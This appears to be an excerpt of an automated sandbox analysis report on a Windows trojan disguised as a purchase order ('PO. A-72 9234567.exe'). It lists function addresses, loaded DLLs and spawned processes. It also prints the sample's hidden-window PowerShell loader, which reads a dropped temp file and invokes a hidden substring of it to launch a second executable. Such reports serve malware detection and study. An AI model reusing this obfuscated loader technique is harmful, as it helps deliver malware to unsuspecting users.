      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF5BF014_2_1FDF5BF0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9FB8014_2_1FD9FB80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3FB7614_2_1FE3FB76
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2DAC614_2_1FE2DAC6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE21AA314_2_1FE21AA3
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1DAAC14_2_1FE1DAAC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDC5AA014_2_1FDC5AA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE37A4614_2_1FE37A46
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3FA4914_2_1FE3FA49
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF3A6C14_2_1FDF3A6C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8995014_2_1FD89950
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9B95014_2_1FD9B950
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1591014_2_1FE15910
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD838E014_2_1FD838E0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDED80014_2_1FDED800
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3F7B014_2_1FE3F7B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE316CC14_2_1FE316CC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDC563014_2_1FDC5630
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE495C314_2_1FE495C3
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1D5B014_2_1FE1D5B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3757114_2_1FE37571
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7146014_2_1FD71460
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3F43F14_2_1FE3F43F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDC739A14_2_1FDC739A
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6D34C14_2_1FD6D34C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3132D14_2_1FE3132D
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE212ED14_2_1FE212ED
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9B2C014_2_1FD9B2C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD852A014_2_1FD852A0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8B1B014_2_1FD8B1B0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4B16B14_2_1FE4B16B
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD6F17214_2_1FD6F172
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDB516C14_2_1FDB516C
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3F0E014_2_1FE3F0E0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE370E914_2_1FE370E9
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD870C014_2_1FD870C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2F0CC14_2_1FE2F0CC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD72FC814_2_1FD72FC8
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8CFE014_2_1FD8CFE0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDFEFA014_2_1FDFEFA0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDF4F4014_2_1FDF4F40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE22F3014_2_1FE22F30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA0F3014_2_1FDA0F30
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDC2F2814_2_1FDC2F28
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3EEDB14_2_1FE3EEDB
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD92E9014_2_1FD92E90
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3CE9314_2_1FE3CE93
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD80E5914_2_1FD80E59
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3EE2614_2_1FE3EE26
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7ADE014_2_1FD7ADE0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD98DBF14_2_1FD98DBF
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8AD0014_2_1FD8AD00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1CD1F14_2_1FE1CD1F
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD70CF214_2_1FD70CF2
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE20CB514_2_1FE20CB5
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD80C0014_2_1FD80C00
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE36BD714_2_1FE36BD7
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3AB4014_2_1FE3AB40
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7EA8014_2_1FD7EA80
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4A9A614_2_1FE4A9A6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD829A014_2_1FD829A0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9696214_2_1FD96962
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDAE8F014_2_1FDAE8F0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD668B814_2_1FD668B8
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8A84014_2_1FD8A840
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8284014_2_1FD82840
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7C7C014_2_1FD7C7C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FDA475014_2_1FDA4750
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8077014_2_1FD80770
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD9C6E014_2_1FD9C6E0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE4059114_2_1FE40591
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8053514_2_1FD80535
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2E4F614_2_1FE2E4F6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3244614_2_1FE32446
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2442014_2_1FE24420
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE403E614_2_1FE403E6
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD8E3F014_2_1FD8E3F0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE3A35214_2_1FE3A352
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE002C014_2_1FE002C0
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE2027414_2_1FE20274
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE381CC14_2_1FE381CC
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE341A214_2_1FE341A2
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE401AA14_2_1FE401AA
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE0815814_2_1FE08158
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FD7010014_2_1FD70100
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1A11814_2_1FE1A118
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: 14_2_1FE1200014_2_1FE12000
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: String function: 1FD6B970 appears 280 times
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: String function: 1FDFF290 appears 105 times
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: String function: 1FDEEA12 appears 86 times
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: String function: 1FDB5130 appears 58 times
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeCode function: String function: 1FDC7E54 appears 111 times
      Source: PO. A-72 9234567.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/17@0/2
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_004049B1 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049B1
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4048:120:WilError_03
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeFile created: C:\Users\user\AppData\Local\Temp\nsuBA6A.tmpJump to behavior
      Source: PO. A-72 9234567.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: PO. A-72 9234567.exeReversingLabs: Detection: 21%
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeFile read: C:\Users\user\Desktop\PO. A-72 9234567.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\PO. A-72 9234567.exe "C:\Users\user\Desktop\PO. A-72 9234567.exe"
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens)
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Notanencephalia.exe "C:\Users\user\AppData\Local\Temp\Notanencephalia.exe"
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Forvaltningslovens=gc -raw 'C:\Users\user\AppData\Local\Temp\Blankbook85\patchworkenes\resprmiernes\Sttemder73.Uns';$Passagerskibe=$Forvaltningslovens.SubString(72100,3);.$Passagerskibe($Forvaltningslovens)Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Notanencephalia.exe "C:\Users\user\AppData\Local\Temp\Notanencephalia.exe"Jump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\PO. A-72 9234567.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\Notanencephalia.exeSection loaded: umpdc.dllJump to behavior
